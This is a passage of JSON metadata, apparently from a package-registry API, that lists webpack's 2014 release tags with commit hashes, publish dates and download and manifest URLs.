v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.11/manifests"},{"name":"v1.4.10","sha":"9a375a770a9b1b235361dcda92844acad196dd47","kind":"commit","published_at":"2014-10-31T11:46:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.10/manifests"},{"name":"v1.4.9","sha":"b02ef8b2c386d34441af4b42aab248aeed014214","kind":"commit","published_at":"2014-10-26T10:19:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.9/manifests"},{"name":"v1.4.8","sha":"c6e1a8fb6d8714dec5bd05b7a6ae80b71b6e0262","kind":"commit","published_at":"2014-10-16T20:31:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.8/manifests"},{"name":"v1.4.7","sha":"4c0e1974e5c49ee4063cf301d49dc977f77a85b6","kind":"commit","published_at":"2014-10-13T14:10:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.7/manifests"},{"name":"v1.4.6","sha":"f0997230f35361ab62c2300133aece93f3ca1cc3","kind":"commit","published_at":"2014-10-12T10:30:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"272d7219cdec5f041e98e2163078c6d2ea772bdf","kind":"commit","published_at":"2014-10-07T13:56:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_u